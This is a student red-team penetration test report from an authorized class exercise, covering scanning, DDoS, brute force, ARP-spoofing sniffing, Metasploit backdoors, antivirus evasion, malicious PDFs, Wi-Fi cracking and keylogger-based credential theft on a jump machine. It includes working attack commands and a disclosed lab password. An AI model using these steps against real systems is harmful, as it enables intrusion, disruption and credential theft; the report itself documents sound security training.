Ethical Hacking &

Penetration Test

RED TEAM 2

Ahmet
Shkoza
Erion Sina
Fabiola
Xhelili
Fjoralba
Shehaj
Gerhard
Arifi Igli
Shkreta
Matilda
Hala
Romina Marqeshi
28 March
2019
1 Co nte nt s
1 CONTENTS
................................................................................................................ 1
2 TABLE OF FIGURES
....................................................................................................... 2
3 EXECUTIVE
SUMMARY................................................................................................... 5
4 INTRODUCTION
.......................................................................................................... 6
5 SCOPE
...................................................................................................................... 8
6 SCANNING
................................................................................................................10
6.1 NMAP
..............................................................................................................10
6.2 TCP SCAN
.........................................................................................................11
6.3 SYN SCAN
.........................................................................................................13
6.4
SPARTA.............................................................................................................15
6.5 NESSUS
.............................................................................................................16
6.6 ACUNETIX
.........................................................................................................19
7 ATTACK PHASE
..........................................................................................................20
7.1 DDOS
..............................................................................................................20
7.1.1 TCP SYN FLOOD
.........................................................................................21
7.1.2 GOLDEN
EYE ...............................................................................................22
7.2 BRUTE FORCE ATTACK
.........................................................................................23
7.3 MAN IN THE MIDDLE ATTACK
.................................................................................25
7.3.1 SNIFFING FTP PACKETS WITH DSNIFF- ARP SPOOFING MITM
ATTACK........................25
7.3.2 SNIFFING WITH CAIN &
ABEL............................................................................27
8 FTP SERVER FUZZING
..................................................................................................37
9 BACKDOOR
..............................................................................................................38
9.1 BACKDOOR CREATED USING METASPLOIT
...................................................................38
 9.2 CREATE FUD BACKDOOR TO BYPASS ANTIVIRUS
...........................................................39
10 SNMP
SNIFF ..............................................................................................................42
11 SOCIAL ENGINEERING
..................................................................................................43
11.1 CREATION OF A ZIPBOMB AND SENDING IT WITH A MAIL.
.................................................43
11.2 SENDING MALICIOUS FILES
......................................................................................44
12 REMOTE DESKTOP PROTOCOL (RDP) SCAN AND ATTACK
......................................................46
13 HACKING WI-FI
.........................................................................................................47
14 HACKING THE JUMP MACHINE
.......................................................................................52
15 SUMMARY
................................................................................................................62

1
2 Ta ble of Fig ures
Figure 1. Network scanning using nmap ...................................................................................... 10

Figure 2. Port scanning using nmap ............................................................................................

11

Figure 3. Port scanning using Metasploit ..................................................................................... 12

Figure 4. TCP scanning using Metasploit..................................................................................... 13

Figure 5. SYN scanning using Metasploit ..................................................................................... 14

Figure 6. SPARTA Scan, In the hosts field, the ip address of the target defined in the left and in the right
are shown the results
................................................................................................................. 15

Figure 7- Nessus scanner results .................................................................................................

18

Figure 8- executive summary from acunetix scanner....................................................................... 20

Figure 9- hping3 Attack..............................................................................................................

21

Figure 10- Denial of Service was successful! ................................................................................. 22

Figure 11. Dictionary attack with Sparta ..................................................................................... 24

Figure 12. Port 3333 sent to brute ...............................................................................................

24

Figure 24. using of Dsniff ...........................................................................................................

26

Figure 25. Login and Paswword sniffing....................................................................................... 26

Figure 13. Opened Cain and Abel tool......................................................................................... 27

Figure 14. Packet Listening ........................................................................................................

28

Figure 15. Selection of network adapter........................................................................................ 29

Figure 16. Turn on the Network adapter ....................................................................................... 29

Figure 17. Network scanning .....................................................................................................

30

Figure 18. Selecting APR tab .....................................................................................................

31

Figure 19. Packet Listening to select the Firewall IP ...................................................................... 32

Figure 20. Poisoning for the firewall IP address ........................................................................... 33

Figure 21. Sniffing results...........................................................................................................

34

Figure 22. Certificates of the visited websites ............................................................................... 35

2
Figure 23. Detailed information of the certificates
......................................................................... 36

Figure 26. FTP Server

Fuzzing.................................................................................................... 37

Figure 27. Infected File

.............................................................................................................. 38

Figure 28. Meterpreter Selection

................................................................................................ 39

Figure 29. Sign the executable with microsoft certificate

................................................................ 39

Figure 30. Check hash on Virustotal.com

...................................................................................... 40

Figure 31. Check file on Virustotal.com

........................................................................................ 40

Figure 32. Backdoor session created successfully

.......................................................................... 41

Figure 33. Make the backdoor persistence

.................................................................................... 41

Figure 34. SNMP

sniff................................................................................................................ 42

Figure 35. Sending Zip Bomb

...................................................................................................... 43

Figure 36. Creation of malicious file

............................................................................................ 44

Figure 37. Reverse TCP

............................................................................................................. 45

Figure 38. Sending file with email

............................................................................................... 45

Figure 39. RDP Scan

................................................................................................................ 46

Figure 40. Attacking

RDP.......................................................................................................... 46

Figure 41. Wireless Adapter Ethernet Dual Antenna.......................................................................

47

Figure 42. Wireless traffic monitor

.............................................................................................. 48

Figure 43. Target Victim

............................................................................................................ 49

Figure 44.
Deauthentication....................................................................................................... 50
 Figure 45. Sniffing from wireless traffic of the AP
.......................................................................... 50

Figure 46. Crack the password

.................................................................................................... 51

Figure 47. Coping SAM and System files

...................................................................................... 52

Figure 48. Extract ntml Hashes

................................................................................................... 52

Figure 49. Decrypt Hashes

......................................................................................................... 53

Figure 50. Loging with local account

........................................................................................... 53

Figure 51. psexec command

........................................................................................................ 54

3
Figure 52. Victim machine-cmd ...................................................................................................
54

Figure 53. Enabling RDP ...........................................................................................................

54

Figure 54. Disable Firewall ........................................................................................................

55

Figure 55. Hiding the folder........................................................................................................

55

Figure 56. Exclude Keylogger Folder ...........................................................................................

56

Figure 57. Installing Keylogger ...................................................................................................

56

Figure 58. Testing Keylogger ......................................................................................................

57

Figure 59. Checking the shared folder .......................................................................................... 57

Figure 60. Checking the log file...................................................................................................

57

Figure 61. Finding User and Password ........................................................................................ 58

Figure 62. Ticket System ............................................................................................................

58

Figure 63. Login to Windows machine.......................................................................................... 58

Figure 64. Finding the IP of DNS ................................................................................................

59

Figure 65. Login to the Windows Machine .................................................................................... 59

Figure 66. List of BT2 users ........................................................................................................

60

Figure 67. Exploring the virtual Infrastructure .............................................................................. 60

Figure 68. Ubuntu Machine (left open): ........................................................................................

60

Figure 69. Exploring the Firewall ................................................................................................

61

Figure 70. No Nat configured for VPN peer .................................................................................. 61

4
 3 Exec ut ive
Summary

RED TEAM 2 was engaged to conduct a focused External Network Penetration Test on a
quantified number of services in the network of BLUE TEAM 2. The purpose of this
engagement was to identify and prioritize the security vulnerabilities on the identified systems.
The engagement was launched on 01.03.2019 and included 27 days of planning, testing,
analyzing and documentation.
The following security issues were identified during the course of the Network Penetration Test:

 No External VPN was found

 DDoS Vulnerability
 FTP Exploitation
 Wi-Fi hacking

The following suggestions are recommended to mitigate the findings:

 VPN should be used

 Prevention of DDoS

 Limiting the Rate of Requests

 Limiting the Number of (simultaneous) Connections
 Closing Slow Connections
 Using Caching to Smooth Traffic Spikes
 FTP should use encrypted channel
 Wi-fi password should meet the complexity policies

5
4 I ntro duct io
n

The project of penetration test conducted from RED TEAM 2 followed all the stages of a
standard external penetration test: Planning, Gathering Information, Discovering Vulnerabilities
and Reporting.
The team was gathered on 1. March in a Kick off Meeting where we discussed on planning and
defining the scope and goals of the project. Furthermore, it was selected the team leader who
would be in charge of controlling all the phases of the project and giving support to all the
members.
Team leader: Ahmet Shkoza
Table 1 – Kick off meeting

Action Item Assigned To Due Date

1. Gathering Information Red Team 2 11/03/2019

2. Deliverables Red Team 2

 Progress Report 12/03/2019

 Executive Summary Red Team 2

 Vulnerability Summary
 Detailed Test results with 27/03/2019
countermeasure to
safeguard against
vulnerabilities
 Recommendation
3. Scanning Matilda Hala 26/03/2019

Fjoralba Shehaj

4. Results Analyzing Red Team 2 26/03/2019

5. DDoS Romina Marqeshi 11/03/2019

Erion Sina

6. Brute Force Attack Fabiola Xhelili 22/03/2019

Dictionary Attack Fjoralba Shehaj

7. WiFi Hacking Ahmet Shkoza 23/03/2019

8. SNMP Sniff Fabiola Xhelili 23/03/2019

6
 8. Man In the Middle Attack Gerhard Arifi 22/03/2019

Ahmet Shkoza

9. Backdoor Gerhard Arifi 25/03/2019

Erion Sina

10. RDP Scan and Attack Erion Sina 25/03/2019

11. Social Engineering Fjoralba Shehaj 26/03/2019

12. Hacking the Jump Machine Igli Shkreta 26/03/2019

13. Report Documentation Red Team 2 27/03/2019

7
5 Sco pe

The scope of the project is to discover the infrastructure of BLUE TEAM 2 and to attack it in
order to gain access to their services. The project will evaluate the security weaknesses of BLUE
TEAM 2’s network systems, will identify the gap of the system security and prepare some
penetration test recommendations to reduce the threat.
All activities were conducted in a manner that simulated a malicious actor engaged in a targeted
attack against Blue Team 2 with the goals of:
- Identifying if a remote attacker could penetrate Blue Team 2 infrastructure.
- Determining the impact of a security breach on the confidentiality of the infrastructure
- Determining the impact of a security breach on the availability of Blue Team 2
information systems
Efforts were placed on the identification and exploitation of security weaknesses that could allow
a remote attacker to gain unauthorized access to organizational data. The attacks were conducted
with the level of access that a general Internet user would have. The assessment was conducted
in accordance with all tests and actions being conducted under controlled conditions.
RED TEAM 2 will use Kali Linux’s tools to perform the attacks.
The tools that will be used are:

1. Nmap (“Network Mapper”)

2. Nessus
3. Sparta
4. Acunetix
5. Hping3
6. Hydra
7. Dsniff
8. Metasploit
9. Pstools
10. Mimikatz
11. Hiren's BootCD PE

8
 12. Windows Spy Keylogger

Security Assessment Characteristics and Requirements

External Network Penetration Assessment – Network-oriented

Gain access to the:

 File Server

 Web Server

 Mail Server

 Wi-Fi AP

9
6 Sca
nning

In the pre-scanning phase, the services that are offered from the Blue Team 2 are already
specified. To get a deeper insight, different tools are used for scanning, in order to get as much
information as possible to penetrate the system. For the purposes of this assessment, our team
has provided the only information that can be used for scanning, which is the WAN interface IP
address (public IP address of the firewall, that is the gateway to the whole system)
Operating System used: Kali Linux, Windows
Tools used: nmap, Metasploit, Nessus, Sparta, Acunetix
The first day resulted that all the ports were filtered. Next day we continued to scan and resulted
that port 21 was opened. The result was helpful to understand that Blue Team 2 had a FTP
service which was unencrypted. This finding was important for the next step of attacking the
FTP server.

6.1 Nmap

Figure 1. Network scanning using nmap

10
 Figure 2. Port scanning using nmap

6.2 TCP Scan

Before performing any scans we should start Metasploit by typing msfconsole .

Scanners are a type of auxiliary module in Metasploit, and to locate the port scanners, we
can type search portscan at the prompt.
This give us several results, including the types of port scans we will be using. Type use
auxiliary/scanner/portscan/tcp to load the module.

11
 Figure 3. Port scanning using Metasploit

The number of threads can also be increased to help the scan run faster To be safe, we can set
this to something like 8. Now we're ready to start the scan. In Metasploit, the run command is
simply an alias for exploit, so it will do the exact same thing. Given we are only conducting
scans, run seems more appropriate, though it really doesn't matter.

12
 Figure 4. TCP scanning using Metasploit

6.3 SYN Scan

Next, we'll move on to a SYN scan.

When performing a number of scans or exploits on a singular target, it can get tiring setting the
same options over and over again. Luckily, there is a command that will set an option globally,
meaning it won't have to be re-entered when using a different module. Use setg to set a global
option.
Now, type run to start the scan.

13
Figure 5. SYN scanning using Metasploit

14
 6.4 Sparta

Also the application of Sparta has nmap integrated, so the result from both tools is almost the
same, but Sparta runs more tools like Nikto, Hydra and is a GUI application.

Figure 6. SPARTA Scan, In the hosts field, the ip address of the target defined in the left and in the right
are shown the results

Results of Sparta:
- FTP server is Filezilla ftpd: port 21 is unencrypted while port 990 is encrypted
- Web Server is Apache, the framework used for the web is Laravel
- Firewall is based on Nginx Server
- Ticketing System – a portable version of OpenSSH, a free implementation of the Secure
Shell protocol in Ubuntu Linux

15
6.5 Nessus

Nessus is used to get a more detailed report that we could use to find breaches on the target
system. It identifies vulnerabilities, like software flaws, missing patches, malware, and
misconfigurations across the target operating systems and applications
Figure 2 shows the detailed report which lists the Vulnerabilities and their level of severity.
Result of Nessus:

In 36 total found vulnerabilities:

4 of them had the medium level of severity – all of them related to the SSL Certificate of the
server:
They show that the certificate may contain a signature that didn’t match the certificate
information or that the certificate may be unrecognized, signed with a weak hash algorithm or
with a medium strength encryption.
Suggested solution: Generating a proper certificate for the web service or reconfiguring it to
avoid the weak hashing and encryption algorithm
One of them had the low level of severity: it shows that the remote service uses the RC4 cipher
which has a low randomness and makes it easier for the attacker to decrypt the obtained
information
Suggested solution: Avoiding RC4 ciphers and using TLS 1.2.
The rest of the shown vulnerabilities are only informational, regarding the hardware, OS and
servers used; so they cannot be directly exploited.

16
17
Figure 7- Nessus scanner results

18
 6.6 Acunetix
To have a better view of the web server and framework, was used Acunetix Scanner. Acunetix
tests for SQL Injection, XSS, XXE, SSRF, Host Header Injection and other web vulnerabilities.
From the scan made several times, the results were the same:

- 4 medium alerts related to Directory Listing and TLS

Directory listing makes it easier to identify the resources at a given path, exposing sensitive
files; it doesn’t necessarily create a security vulnerability, which means that the resources
cannot be accessible from unauthorized parties.
Suggested solution: correctly configuring web server for the paths beneath the web root

TLS 1.0 is not considered strong, so TLS 1.1 or higher is recommended

- 6 alerts of low-level severity

Alerts related to cookies instruct that the cookie can be accessed not in secure channels

Suggested solution: The flag of Httponly and Secure should be set

Other alerts are still of low severity and already found in the Nessus Scanner.

What makes this application interesting, that is more web-oriented and can give hints of
problems related to the web service.

19
 Figure 8- executive summary from acunetix scanner

The framework used is Laravel, that comes out of the box with already implemented security
features. Hence, most of the vulnerabilities detected from Acunetix have a very low likelihood
and severity. In this aspect, those vulnerabilities are difficult to exploit.
Scanning phase has continued every day to check.

7 A ttac k
phase

7.1 DDoS
A distributed denial of service (DDoS) attack is an attempt to make a service unavailable. Unlike
other kinds of attacks, which establishes foothold or hijacks data, DDoS attacks do not threat
sensitive information. It is just an attempt to make a service unavailable to legitimate users. In
our scenario, we used DDoS for taking down web application firewall.
Network and Transport Layer Attacks

These types of attacks focus on targeting the transport and network layers.
These usually consist of volumetric attacks that aim to overwhelm the target
machine with malicious traffic and consuming all resources and making server unresponsive.

20
 7.1.1 TCP SYN FLO
OD
The aim of SYN flood is sending lots of SYN packets to the server and ignoring SYN+ACK
packets returned by the server.
If an attacker sends enough SYN packets, this will overwhelm the server because servers are
limited in the number of concurrent TCP connections. If the server reaches its limit, it cannot
establish new TCP connections until the existing connections which are in the SYN-RCVD
state timeout.
In order to perform SYN flood attacks we have used hping3.
hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-
facto tools for security auditing and testing of firewalls and networks, and was used to exploit the
Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of
hping, hping3, is scriptable using the Tcl language and implements an engine for string based,
human readable description of TCP/IP packets, so that the programmer can write scripts related
to low level TCP/IP packet manipulation and analysis in a very short time.
root@kali:~# hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping is a command-line oriented TCP/IP packet assembler/analyzer. It supports TCP, UDP,
ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered
channel, and many other features.

It is used in our case it used traceroute mode, was verbose in ICMP mode and it could
successfully shut down the firewall, making its public IP unreachable.

Figure 9- hping3 Attack

Also we tried Advanced SYN flood with random source IP, different data size, and window size:

21
root@kali:~# hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source
TARGET_SITE
–flood: sent packets as fast as possible
–rand-source: random source address
-c –count: packet count
-d –data: data size
-S –syn: set SYN flag
-w –win: winsize (default 64)
-p –destport: destination port (default 0)

7.1.2 GOLDEN E
YE
GoldenEye is a HTTP Denial of Service Tool in Python. It uses KeepAlive paired with Cache-
Control options to persist socket connections, busting through caching (when possible) until it
consumes all available sockets on a HTTP/S server.
GoldenEye changes generated requests dynamically, it randomizes user agents, referrers and
almost all of the various parameters used.
Our attack parameters:
Number of workers:10
Connection/wrk: 500
NoSSLcheck: True (as their firewall has a self-signed ssl certificate)
Method : GET

Figure 10- Denial of Service was successful!

22
 7.2 Brute Force Attack

It was made a great effort from our team to realize a Brute Force Attack but unfortunately
resulted unsuccessful. The tool used for cracking the password was Hydra, as it is the best
password cracking tool. As it is shown in the figure below, the passwords were all encrypted
very well and we could not crack any.
For brute forcing Hydra needs a list of passwords. There are lots of password lists available. The
password list is pre-installed on Kali Linux and its password list can be found at the following
location:
/root/Desktop/bruteforce-database-master/word.lst
The command used in kali Linux was:
# hydra –l admin –P /root/Desktop/bruteforce-database-master/word.lst –e ns –m https:
10.100.200.34:3333 –vV 10.100.200.34 http-get
The option “l” tells the username or login to
use.
Next comes the capital “P” option which provides the word list to use. Hydra will pick up each
line as a single password and use it.
The option “-e ns” is used to try "n" null password, "s" login as pass.
The option -m provides the list of servers to be attacked in parallel, one entry per line
The “v” option is for verbose and the capital “V” option is for showing every password being
tried. Last comes the host/IP address followed by the service to crack.

23
 Figure 11. Brute force with Hydra

Another step was trying to crack the username and password, done from Sparta application. The
files used for this attack were txt files, containing guessed words for the passwords.
The target IP: Public IP of the firewall
Target Port: 3333
Comand used: Send to brute
Service: https-post
Username known: admin or Dekra

Password guessed: dictionary txt files

Figure 12. Dictionary attack with Sparta

However, the result was unsuccessful!

24
7.3 Man In the Middle At
tack

7.3.1 SNIFFING FTP PACKETS WITH DSNIFF- ARP SPOOF

I N G M I T M ATTACK
Man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly
alters the communication between two parties who believe they are directly communicating with
each other.

Scenario:

 Victim’s Machine – Windows machine (10.100.200.134)

 Attacker’s Machine – Kali Linux (10.100.200.62)
 Router’s IP Address (external FW IP Address) – Gateway (10.100.200.34)

The first step is to configure our attacking machine to enable packet forwarding. This will allow
our attacking machine to mimic itself as the router. Tricking the victim machine into thinking it’s
connecting to the router but really it will be connecting back to the attacking machine.

The first step is to configure our attacking machine to enable packet forwarding, this will allow
our attacking machine to mimic itself as the router. Tricking the victim machine into thinking it’s
connecting to the router but really it will be connecting back to the attacking machine.

For packet forwarding, you need to open a new terminal and type
“echo 1 > / proc/ sys/net/ipv4/i
p_forward“.
Our Target IP address will be :
Now the next step is to setup a arpspoof between victim and router. Arpspoof is a command line
utility that allows us to intercept packets on a switched LAN. This is an extremely effective way
of sniffing traffic on a switch.

Syntax: arpspoof -i [Interface Name] -t [Victim’s IP] -r [Router’s IP]

So in our case,
-i = eth0
-t = 10.100.200.134
-r = 10.100.200.34
So the final command will be:
Command: arpspoof -i eth0 -t 10.100.200.134 -r 10.100.200.34
To use Dsniff, we proceed with: “dsniff -i
eth0“.
25
 Figure 13. using of Dsniff

Figure 14. Login and Password sniffing

26
 In above screenshot, we successfully sniffed the login and password information of FTP
protocol.

Recommendation:
1- Disck Quotas
2- Access by IP

7 . 3 . 2 S N I F F I N G W I T H C A I N & ABEL

Step 1:
First we turned off the windows firewall or any other third-party firewall, so that all the packets
are captured efficiently.

Step 2:
Open Cain and Abel tool

Figure 15. Opened Cain and Abel tool

27
Step 3:

Then we switched to Sniffer Tab and clicked Configure in the main menu to configure our
packet listening adapter.

Figure 16. Packet Listening

Step 4:
Selected the appropriate network adapter for our network that we wanted to sniff the packets for
plain-text passwords. Click Ok.

28
 Figure 17. Selection of network adapter

Step 5:
The Green Adapter must be clicked to turn on the network adapter that we just configured.

Figure 18. Turn on the Network adapter

29
Step 6:

By scanning the network we populated the table with all pc’s on our LAN.

Figure 19. Network scanning

Step 7:
Now select the APR tab below as shown and now first click on the right side upper pane area.
When we click that area the blue plus (“+”) icon will get enabled. Let’s press that blue plus (“+”)
icon.

30
 Figure 20. Selecting APR tab

Step 8:

Now we need to select the firewall`s IP address and click ok. This means that we want to listen
to every packet that is sent to firewall. If we select any other IP address in our LAN network then
we can listen to only that particular HOST on the network. Since the router responds to all the
request of HOSTS connected in a LAN, we can listen to all the HOSTs. Now we click the
Yellow Circle icon as shown. This means that we are starting ARP poisoning.

31
 Figure 21. Packet Listening to select the Firewall IP

On the picture below we can see the full poisoning for the firewall IP address

32
 Figure 22. Poisoning for the firewall IP address

Step 9:

We now can see the results of our sniffer

The password tab which is at the bottom. We can see that we are getting passwords of HTTP i.e.
plain text session in our LAN network.

33
 Figure 23. Sniffing results

On APR tab we get the certificates for the visited websites

34
 Figure 24. Certificates of the visited websites

By right-click on a specific certificate file we can get valuable information about different
subjects of that certificate, as shown is the picture below.

35
 Figure 25. Detailed information of the certificates

Aside from finding the vulnerabilities of the first interface with the the Blue Team 2, which was
the firewall, the next step was testing the services the Blue Team has created.

36
 8 FTP Server Fuzz ing
FTP server may be vulnerable to buffer overflow is a relatively simple protocol, but due to the
high number of commands and various parameters.

Tool used: Infigo FTPStress Fuzzer, it allows a user to define FTP commands that need to be
tested and the length and type of data that will be sent to the target application.
Operating system: Windows

State of the FTP Server: in general, no traffic generated

Figure 26. FTP Server Fuzzing

37
9 Bac
kdoor

9.1 Backdoor created using Me

tasploit
After finding the login credentials of the File server we could enter to their File Server.
The login credentials were:

Username : dekra
Password: Bt22019
We tried to realize a backdoor by inserting a zip file in their File Server that contained a .exe file
created with Metasploit.
The file was created with the following command:
root@Kali: /opt/metasploit-4.4.0/msf3# msfpayload windows/meterpreter/reverse_tcp lhost=
10.100.200.x lport=4444 x > passwordet e juja te leshit.exe
After creating the file, we zipped it so that the payload would appear only some KB. The name
of the file was set to encourage curiosity of the Blue Team 2, so that they would open the zip. In
case they would have opened the zip the payload could have made the server unreachable. Being
that Blue Team2 was aware of our attacks, this scenario never happened to succeed. Anyway we
continue to have access to their FTP server without being noted or prevented from them. This is
a critical finding because in a real scenario, we could have access to important documents and
files.

Figure 27. Infected File

38
 9.2 Create FUD Backdoor to bypass antivirus

Used framework: Phantom-Evasion

Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate
(almost) FUD executable with the most common 32 and 64 bit msfvenom payloads.
Backdoor connection type(s) : Reverse_HTTP

Format : Executable
Payload library : Msfvenom
Sign Executable : Microsoft Certificate, (prenting pop-up a warning alerting the user that the
executable is from an unknown source, instead it will be recognized as a Microsoft app)

Additional encoders : Shikata_na_gai & Countdown (lowing the detection rate)

Selecting the meterpreter type and generating the file

Figure 28. Meterpreter Selection

Sign the executable with microsoft certificate

Figure 29. Sign the executable with microsoft certificate

39
Check file hash & file on Virustotal.com

Figure 30. Check hash on Virustotal.com

Figure 31. Check file on Virustotal.com

Post-exploitation: Persistence + Privilege escalation

After the backdoor has been sent, a listener session will be started within Metasploit to create a
remote handler in case the backdoor will be executed from Blue Team.

Backdoor session created successfully

40
 Figure 32. Backdoor session created successfully

Now if we type “sysinfo” we get the information from the Windows 10 machine. If we need to
get a full shell session instead of using the Metasploit’s one, we have to type “shell”.

Make the backdoor persistence

Figure 33. Make the backdoor persistence

Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter
(listener) on the victim's system. In our case the persistence step was not successful because of
the security restrictions.

41
10 SNMP s niff

The Simple Network Management Protocol (SNMP) is the most basic method of gathering
bandwidth and network usage data. It can be used to monitor bandwidth usage of routers and
switches port-by-port, as well as device readings like memory, CPU load etc.
By monitoring the snmp traffic we could find the password of snmp. In our case snmp was not
configured and it was used version 1, which itself presents a vulnerability because of using
unencrypted communication.
If our scenario would work and the snmp would be configured, further we could raise a network
monitor. By putting the found password of the snmp, we could discover all their network devices
and have control on them.

We used dsniff to monitor the snmp traffic.

Figure 34. SNMP sniff

42
 11 Soc ial eng ineering

1 1 . 1 C r e a t i o n o f a zi p b o m b a n d s e n d i n g i t wi t h a m a i l .
A zip bomb, also known as a Zip of Death or decompression bomb, is a malicious archive file
designed to crash or render useless the program or system reading it.
Operation system used: Windows

- Create a new text file.name it hello.txt

- Make null bytes inside the file
- Create copies couple times in the same directory and name them accordingly.
- Compress the folder that contains the files

Sending the file with e-mail

Figure 35. Sending Zip Bomb

Scenario: The folder is sent as a report from the IT Department, and the employee, not knowing
what exactly the ITCheckResults.zip contains, opens it.

43
11.2 Sending malicious files
Tool used: Metasploit Framework
Vulnerability exploited: the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer
Overflow
Step 1: Enter the module of adobe_utilprintf
Step 2: Use reverse shell (setting payload)
Step 3: Setting localhost and localport (the IP address to which the target machine connects to,
the port that the listener binds to)
Step 4: Creation of the malicious file
Step 5: Setting up the listener to capture the reverse connection

The mail can be send using using a little script in the Kali terminal, or just sending it as a simple
user would do, attaching the file and sending it with the e-mail.

Figure 36. Creation of malicious file

44
 Figure 37. Reverse TCP

Sending it from terminal would result so:

Figure 38. Sending file with email

In a real-life scenario, the file would be opened from the employee which is not aware of the
risk. In the case, the Blue Team 2 was aware of the attacks that Red Team 2 was doing, so they
didn’t click on the file.

45
12 Re mo te Des ktop Protoco l (RDP) sca n a nd a ttac k

From the information we gathered during our scanning sessions and enumerations, was found
that their RDP service is enabled and uses port 3390 (instead of 3389 by default).
To identify if the host is vulnerable to a RDP attack, we’ll use MS12-020-check exploit from
Metasploit.
Framework : Metasploit
Module(s) : scanner/rdp/ms12_020_check , dos/windows/rdp/ms12_020_maxchannelids
MS12-020-check : this vulnerability could allow remote code execution if an attacker sends
sequence of specially crafted RDP packets to an affected system. https://docs.microsoft.com/en-
us/security-updates/SecurityBulletins/2012/ms12-020

Checking RDP vulnerability with ms12_020_check module

Figure 39. RDP Scan

Attacking RDP with Ms12-0200maxchannelids module

Figure 40. Attacking RDP

46
 Results: From the output of Metasploit module we received “Service Unreachable” after sending
the crafted RDP packets, which means that we were able to disrupt their RDP service for some
seconds or this may be a false positive alarm.

Improvements

 Install latest security updates from vendor.

Reference : https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020

13 Hac king Wi -f i
For this hacking method we need a wireless network adapter that supports monitor mode. Our
laptop’s wireless network card could also work, but generally an external Card with extended
range capability is advised. In our testing we have used a USB WiFi Wireless Adapter Ethernet
Dual Antenna Long Range. Like the one in the picture below with a 150 Mbps capability

Figure 41. Wireless Adapter Ethernet Dual Antenna

Step 1.

 airmon-ng start wlan0

This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the
wireless traffic that passes by us in the air.

47
 Figure 42. Wireless traffic monitor

Step 2.

 airodump-ng wlan0mon

This command grabs all the traffic that our wireless adapter can see and displays critical
information about it, including the BSSID (the MAC address of the AP), power, number of
data frames, channel, speed, encryption (if any) and the SSID.

48
 Figure 43. Target Victim

Step 3.

On our next step we focus our efforts on Blue Team AP, on one channel, and capture traffic
data from it. We use the following command;

 airodump-ng --bssid 78:8A:20:D4:57:45 -c 11 --write Wteam2 wlan0mon

step 4.
In order to capture the encrypted password, we need to have the client authenticate against
the AP. If they're already authenticated, we can de-authenticate them (kick them off) and
their system will automatically re-authenticate, whereby we can grab their encrypted
password in the process. To make this process possible, we use the following command;

 aireplay-ng --0 5 -a 08:86:30:74:22:76 –c

wlan0mon

49
 Figure 44. Deauthentication

Now we wait until we sniff enough packets from the wireless traffic of the AP, in order to get the
WPA handshake.

Figure 45. Sniffing from wireless traffic of the AP

50
 Step 5.
Now we have our Wteam2.cap which contains the encrypted PASSWORD. Our last step is to
crack the password from this file. There are several methods to try cracking an encrypted
password. If we have a good wordlist we try with aircrack-ng command, because it has a high
testing capability, obviously based on our hardware capabilities. So now test Wteam2 packets
file again our wordlist which contains a high number of possible passwords.

 aircrack-ng Wteam2-01.cap -w /root/Desktop/wordlists/r0ckyou.txt

Figure 46. Crack the password

51
14 Hac king t he Jump Mac hine

The main purpose of this kind of attack is to reach the jump machine that the target IT Admins
are using to login in their Environment with the final goal to get users and passwords. To make
this possible we decided to hack first a local PC we were using in our class supposing that the
image used from KPT is the same everywhere (including the jump machine). Once we have the
local Admin password (which can be the same in every PC of KPT), we can control the jump
machine.

Phase1 “Taking Control”:

1. Booting from live-CD (Hirens Boot PE)
2. Coping SAM and System files from C:\\Windows\System32\Config

Figure 47. Coping SAM and System files

3. Extract ntlm Hash-es of the local users (mimikatz)

Figure 48. Extract ntml Hashes

52
 4. Decrypt Hashes with online decryptor (www.onlinehashcrack.com)

Figure 49. Decrypt Hashes

5. Login with pcadmin using the found password.

Figure 50. Loging with local account

53
6. Open CMD of the target victim PC with PsTools (psexec command)
After loging in our compromised PC with the local Admin account (pcadmin), we will
run the target PC command prompt using PsExec of Pstools.

Figure 51. psexec command

7. Confirming that we are on cmd of the target PC

Figure 52. Victim machine-cmd

8. Enabling RDP on target PC by editing Windows Registry

In order for us to proceed with our plan of taking jump machine control we decided to
enable RDP of the target PC by editing the respective registry value.

Figure 53. Enabling RDP

54
 9. Disable Firewall (Windows Defender)
In this step we will disable temporally Windows Defender.

Figure 54. Disable Firewall

10. Creating a folder “kot” on D drive, sharing it and making it hidden

In order to have a excluded path (folder) where to install our tool, we created a folder
named “kot” in D drive, we make it hidden, and share it in order to be easily reachable
from us.

Figure 55. Hiding the folder

55
11. Excluding “kot” folder from firewall
In this way we are safe to proceed coping the tool and installing it on this excluded path.

Figure 56. Exclude Keylogger Folder

12. Installing on path D:\kot Windows Spy Keylogger

Figure 57. Installing Keylogger

56
 13. Testing the keylogger is active
In this step we are simulating the victim is typing and we see the log file being populated.

Figure 58. Testing Keylogger

14. Checking that the shared folder is reachable:

Figure 59. Checking the shared folder

Phase 2 “Elaborating the populated Log file”:

1. Checking that the log file is being populated with data (username and password of
firewall):

Figure 60. Checking the log file

57
2. Finding the User and Password of Domain User (potentially domain admin)

Figure 61. Finding User and Password

3. Ticketing system user and password:

Figure 62. Ticket System

4. Login to Windows machine and confirming that the found credentials are working
In this step we will use the username and password extracted from logs to login in their
Environment (in this case a Windows Machine). The Certificate acceptance prompt
means that our credentials are right ones.

Figure 63. Login to Windows machine

58
 5. Finding the IP of DNS (potentially the Domain Controller IP)
After login we figure out (from the enabled Roles) that this machine is not their most
important one (Hyper-V or Domain Controller) . The next step will be to reach the DC.

Figure 64. Finding the IP of DNS

6. Login to the Windows Machine (which results to be their DC and Hyper-V Server):
Using the same credentials we were able to login in their Domain Controller which has
AD, DNS and Hyper-V roles enabled.

Figure 65. Login to the Windows Machine

59
7. Hello Team 
No comment..

Figure 66. List of BT2 users

8. Exploring the virtual Infrastructure:

We can reach now every running machine, practically everything.

Figure 67. Exploring the virtual Infrastructure

9. Ubuntu Machine (left open):

Figure 68. Ubuntu Machine (left open):

60
 10. Exploring the Firewall
In this step we will login and explore their Firewall.

Figure 69. Exploring the Firewall

11. No Nat configured for VPN peer (means that VPN does not Work)
The VPN peer is not accessible from outside which means that the VPN peer cannot be
reached.

Figure 70. No Nat configured for VPN peer

61
15 Summary

Initial reconnaissance of the Blue Team network resulted in the discovery of a pfSense appliance
in the Firewall, also Snort monitoring system that make the internal system isolated from
external attacks.
